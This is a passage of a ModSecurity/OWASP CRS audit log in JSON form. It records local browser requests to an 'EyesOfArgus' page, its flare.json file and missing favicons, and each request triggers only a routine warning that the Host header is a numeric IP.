{"transaction":{"time":"13/May/2017:12:40:25 --0400","transaction_id":"WRc2@X8AAQEAAAkYuFgAAAAD","remote_address":"127.0.0.1","remote_port":42190,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2@X8AAQEAAAkYuFgAAAAD\"]"],"stopwatch":{"p1":775,"p2":1300,"p3":114,"p4":423,"p5":91,"sr":38,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:44:44 --0400","transaction_id":"WRc3-H8AAQEAAAkVV5IAAAAA","remote_address":"127.0.0.1","remote_port":42586,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:40:22 GMT","If-None-Match":"\"295-54f6a7a6d5cf8\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:44:41 GMT","ETag":"\"295-54f6a89db971f\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc3-H8AAQEAAAkVV5IAAAAA\"]"],"stopwatch":{"p1":441,"p2":1203,"p3":60,"p4":152,"p5":54,"sr":22,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:44:44 --0400","transaction_id":"WRc3-H8AAQEAAAkVV5MAAAAA","remote_address":"127.0.0.1","remote_port":42586,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc3-H8AAQEAAAkVV5MAAAAA\"]"],"stopwatch":{"p1":412,"p2":922,"p3":47,"p4":355,"p5":50,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:44:44 --0400","transaction_id":"WRc3-H8AAQEAAAkVV5QAAAAA","remote_address":"127.0.0.1","remote_port":42586,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc3-H8AAQEAAAkVV5QAAAAA\"]"],"stopwatch":{"p1":382,"p2":879,"p3":44,"p4":237,"p5":46,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:21 --0400","transaction_id":"WRc4XX8AAQEAABwNvyAAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4XX8AAQEAABwNvyAAAAAA\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":553,"p2":1248,"p3":51,"p4":310,"p5":55,"sr":40,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:21 --0400","transaction_id":"WRc4XX8AAQEAABwNvyEAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:44:39 GMT","ETag":"\"cc8-54f6a89c37b32-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1210","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4XX8AAQEAABwNvyEAAAAA\"]"],"stopwatch":{"p1":380,"p2":869,"p3":58,"p4":312,"p5":50,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:22 --0400","transaction_id":"WRc4Xn8AAQEAABwNvyIAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:46:18 GMT","ETag":"\"295-54f6a8fa838c0\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4Xn8AAQEAABwNvyIAAAAA\"]"],"stopwatch":{"p1":381,"p2":885,"p3":67,"p4":140,"p5":58,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:22 --0400","transaction_id":"WRc4Xn8AAQEAABwNvyMAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4Xn8AAQEAABwNvyMAAAAA\"]"],"stopwatch":{"p1":415,"p2":939,"p3":52,"p4":242,"p5":82,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:22 --0400","transaction_id":"WRc4Xn8AAQEAABwNvyQAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4Xn8AAQEAABwNvyQAAAAA\"]"],"stopwatch":{"p1":377,"p2":797,"p3":90,"p4":312,"p5":47,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:01 --0400","transaction_id":"WRc4hX8AAQEAABwOGnsAAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at 